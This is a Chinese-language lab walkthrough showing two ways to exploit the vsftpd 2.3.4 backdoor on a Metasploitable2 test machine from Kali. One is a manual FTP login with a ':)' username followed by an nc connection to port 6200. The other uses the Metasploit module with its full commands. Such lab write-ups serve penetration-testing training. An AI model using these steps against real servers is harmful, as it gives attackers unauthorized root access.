vsftpd_234_backdoor(笑脸漏洞)

    攻击机和受害机的IP
    kali: 192.168.75.130
    Metasploitable2 - Linux: 192.168.75.128

方法一:

1.测试其流通性

在这里插入图片描述
2. 扫描受害机的服务信息
在这里插入图片描述
3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意

在这里插入图片描述
注意(在输入密码回车后会有停顿,记住不要关闭ftp连接)
4. 此时扫描到受害机会反弹一个6200端口
在这里插入图片描述
5.使用 nc 连接会发现是root权限
在这里插入图片描述
笑脸漏洞利用成功.

如果上面的方法不会的话,下面介绍更简单的方法。

方法二:

打开msf框架
命令为:msfconsole
在这里插入图片描述

搜索笑脸漏洞
命令为: search vsftpd
在这里插入图片描述
使用改模块
命令为: use 0 或者 use exploit/unix/ftp/vsftpd_234_backdoor
在这里插入图片描述
设置攻击的受害机
命令为: set rhosts 192.168.75.128
在这里插入图片描述
运行该模块
命令为: run 或者 exploit
在这里插入图片描述
同样获取的也是root权限。
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!

Logo

更多推荐